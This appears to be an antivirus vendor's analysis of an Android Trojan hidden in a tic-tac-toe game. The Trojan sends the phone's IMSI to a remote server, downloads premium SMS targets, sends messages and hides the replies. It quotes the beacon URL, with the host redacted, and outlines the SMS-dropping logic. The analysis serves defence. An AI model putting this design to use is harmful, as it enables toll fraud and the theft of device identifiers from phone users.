Android/Lovetrap.A!tr

Analysis

Android/Lovetrap.A!tr is a Trojan for mobile phones running Android. It looks like an innocent application (such as a tic-tac-toe game) but, in background, connects to a remote web site, gets a list of phone numbers from that web site, and then sends SMS to those phone numbers.
The phone numbers it sends SMS to typically correspond to value-added services and may be non-free.

Technical Details

When the malicious sample is installed, a new icon for the "game" appears in the Application Launcher. The game looks genuine and works.

Figure 1. Tic tac toe game containing Android/Lovetrap.A!tr
But, in background, the malware launches a service, a SMS receiver and a boot receiver.
Initially, the malware connects to a remote server sending the victim's IMSI and a hard-coded application id (value hard coded to "LOVT"):

http://[REMOVED]/careu/positionrecorder.asmx/getS3?imsi=IMSI&appid=LOVT

Then, it contacts the server again to get a list of phone numbers.
The list is formatted as PHONENUMBER*BODY.
The malware will then send an SMS to that phone number, with the corresponding body.
Whenever the phone receives an SMS, the malware's SMS receiver handles the incoming message. For each incoming SMS, it retrieves the body of the SMS. If the body of the SMS corresponds to one of the bodies it has already sent, it drops the SMS. If not, it checks the originating phone number of the SMS: if it corresponds to a phone number it has sent SMS to, it drops the SMS too.
This SMS-dropping mechanism is assumed to remove bouncing or confirmation SMS messages.

Recommended Action

FortiGate Systems

• Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
  FortiClient Systems
  
• Quarantine/delete files that are detected and replace infected files with clean backup copies.